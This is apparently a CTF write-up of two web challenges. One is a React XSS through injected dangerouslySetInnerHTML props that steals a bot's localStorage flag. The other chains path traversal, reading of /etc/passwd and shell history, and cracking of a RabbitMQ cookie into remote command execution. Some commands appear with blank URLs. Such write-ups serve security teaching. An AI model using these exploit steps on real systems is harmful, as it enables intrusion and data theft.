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Created June 22, 2019 17:20
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card maker

Simple web challenge. Application was built with React framework, and contained reporting functionality:

fetch("/api/report", {
    method: "POST",
    body: JSON.stringify({ hash: x }),
    headers: {
        "Content-Type": "application/json"

It means that it's a XSS challenge. The only way to make XSS in React application i know, is to inject arbitrary props to components and thus set dangerouslySetInnerHTML to our value. So lets look at code and find where we can inject arbitrary prop values:


We control e value, third argument of createElement means that we control children element of h1, lets look at Sp function.

function Sp(p){
	return p?(
		("object"!==wp(p)||!("children"in p))&&(p={children:p}),m.a.createElement("span",p)

So if e will be an object with childen property set, it'll be passed to createElement as properties of span component. Thats what we need. The only problem is that React doesnt allow children and dangerouslySetInnerHTML properties set at the same time. Luckily, Sp function checks only if object has key children and doesnt check its value. So the final object executing arbitrary JS code is:

{"nickname":"a","name": {"children": null,"dangerouslySetInnerHTML":{"__html": "<svg/onload=alert(1)>"}},"email":"c@c.c"}

And the flag was in bot's browser localStorage: - - [12/Jun/2019:19:13:59 +0000] "GET /?{%22flag%22:%228776d94289caed05c39973258e616702%22} HTTP/1.1" 200 288 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/73.0.3683.103 Safari/537.36"


The first think that we have to mention is the difference between 404 page for .txt and .php requests. It means that .txt requests are processed by application. Lets try to use double url-encoded payload there then:

$ curl ''

rabbitmq:x:102:104:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/usr/sbin/nologin

Cool! Now we see d90pwn user with /bin/sh shell. Lets try to read his shell history (which should be at .history file actually, but ¯\(ツ)/¯ ):

$ curl ''

<pre>-ne youtube-dl
rm ~/Desktop/Screenshot*.jpg

User tried to remove his screenshots, but by default, they are stored in PNG format. Now here comes the most hard part of challenge - we need to guest the file format and bruteforce the filenames. I tried to use default Screenshot from YYYY-MM-DD HH-MM-SS.png format, but it seems that there is too much to bruteforce. Luckily, there was a hint, that user makes screenshots with windows only (sic!) lightshop app, which use more simple format like Screenshot_%d.png. There were several screenshots, but most interesting was Screenshot_7.png. It contains log of rabbitmq containing it's cookie hash. If we could bruteforce this hash, we could authenticate on rabbitmq and thus obtain code exection. By the way, there is a cool github repo full of useful rabbitmq tools:

$ ./crack-hash w1k7PZrV+u6Wyi9v+CMOBg==
  seed used to generate it = 467090129

And now we can execute arbitrary commands and thus read the flag:

$ ./ 25672 BQZTVTPCQWIPDDSGROAD 'cat /flag'    
[*] authenticated onto victim
[*] disconnecting from victim
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